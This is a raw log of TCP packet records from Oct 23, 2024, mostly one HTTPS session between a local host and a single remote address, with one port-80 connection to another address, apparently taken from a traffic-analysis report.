Oct 23, 2024 08:14:51.613990068 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:51.614242077 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:51.614373922 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:51.614386082 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:52.467112064 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:52.467204094 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:52.469054937 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:52.469064951 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:52.469355106 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:52.471072912 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:52.511336088 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:53.379020929 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:54.811454058 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.811572075 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:54.820585012 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.820760012 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:54.928700924 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.928796053 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:54.928813934 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.930933952 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.931009054 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.931027889 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:54.931045055 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.931232929 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:54.937870026 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.945792913 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.945825100 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.945877075 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:54.945895910 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:54.945934057 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.045803070 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.045893908 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.045926094 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.046030045 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.046050072 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.046123028 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.046247005 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.048372030 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.048424959 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.048437119 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.060110092 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.060213089 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.060233116 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.063421965 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.063709974 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.063725948 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.111345053 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.334567070 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.334629059 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.334695101 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.334719896 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.334858894 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.334923983 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.335493088 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.335572004 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.335623980 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.335632086 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.335908890 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.335915089 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.338263035 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.338290930 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.338351965 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.338376999 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.338387966 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.338429928 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.338820934 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.338820934 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.338834047 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.338841915 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.338890076 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.339042902 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.339096069 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.339175940 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.339186907 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.339334965 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.397706985 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.400185108 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.400233030 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.400268078 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.400290012 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.400302887 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.400590897 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.411995888 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.414978981 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.415018082 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.415074110 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.415098906 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.415160894 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.415257931 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.415288925 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.415326118 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.415333033 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.416143894 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.515024900 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.515090942 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.515207052 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.515219927 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.517488003 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.517560959 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.517570019 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.529364109 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.529439926 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.529448032 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.532417059 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.532507896 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.532536030 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.532557011 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.532566071 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.532629967 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.532980919 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.533013105 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.533123970 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.533132076 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.533212900 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.632375956 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.634721041 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.634758949 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.634780884 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.634798050 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.634941101 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.646584988 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.661463022 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.661500931 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.661531925 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.661572933 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.661604881 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.661621094 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.661649942 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.661700010 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.661806107 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.661884069 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.661902905 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.704972982 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.749718904 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.749777079 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.749821901 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.749836922 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.752003908 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.752094984 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.752105951 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.763987064 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.764061928 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.764074087 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.778692007 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.778764963 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.778773069 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.778810024 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.778877974 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.778897047 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.779258966 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.779292107 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.779329062 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.779349089 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.780157089 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.780164003 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.829925060 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.867522001 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.869529963 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.869551897 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.869630098 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.869647980 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.869877100 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.881342888 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896121979 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896151066 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896202087 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.896222115 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896270037 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896286964 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.896300077 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896322012 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.896748066 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896780968 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896812916 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.896821022 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896909952 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.896960020 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.896969080 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.897169113 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.984762907 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.986661911 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.986690998 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.986731052 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.986747026 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:55.986900091 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:55.998671055 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.013607979 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.013694048 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.013711929 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.013724089 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.013736010 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.013796091 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.013817072 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.013910055 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.013969898 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.014194965 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.014247894 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.014264107 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.014842033 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.015007973 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.015022993 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.064253092 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.104136944 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.104922056 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.104949951 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.104984999 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.105026960 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.105051041 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.105067015 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.116871119 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.116955042 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.116978884 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.131742954 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.131844044 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.131881952 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.131885052 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.131892920 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.131941080 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.132210970 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.132286072 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.132389069 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.132438898 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.132515907 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.132523060 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.173683882 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.173846960 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.219429016 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.219475985 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.219508886 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.219520092 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.219561100 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.221363068 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.233277082 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.233320951 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.233597040 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.233608961 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.233719110 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.248157978 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.248527050 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.248569012 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.248651028 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.248667002 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.248800039 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.248924971 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.249032974 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.249102116 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.249131918 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.249161005 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.249169111 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.249231100 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.291121006 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.291181087 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.291197062 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.336683035 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.336787939 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.336929083 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.336941004 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.337138891 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.338474989 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.351011038 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.351176977 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.351190090 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.365731955 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.365762949 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.365818024 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.365845919 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.365858078 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.365876913 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.366331100 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.366512060 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.366520882 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.366602898 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.366707087 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.366725922 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.366739035 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.366847038 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.367172956 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.407809973 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.407846928 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.407887936 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.407906055 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.407984018 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.454190016 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.455723047 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.455797911 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.455801010 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.455817938 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.455868959 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.483198881 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.483280897 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.483309984 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.483339071 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.483350039 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.483381033 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.483517885 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.483722925 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.483767033 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.483814955 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.483822107 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.483875036 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.484373093 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.524806976 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.524868011 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.524905920 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.525068045 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.525068045 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.525088072 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.572470903 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.572513103 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.572691917 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.572710037 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.572824001 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.573128939 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.573251009 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.574392080 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.574402094 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.600677967 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.600790024 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.600820065 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.601006031 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.601037025 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.601064920 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.601094961 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.601106882 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.601116896 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.601751089 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.601790905 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.601816893 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.601835012 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.601860046 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.642200947 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:56.642266989 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:56.642272949 CEST	443	49778	142.250.185.193	192.168.2.10
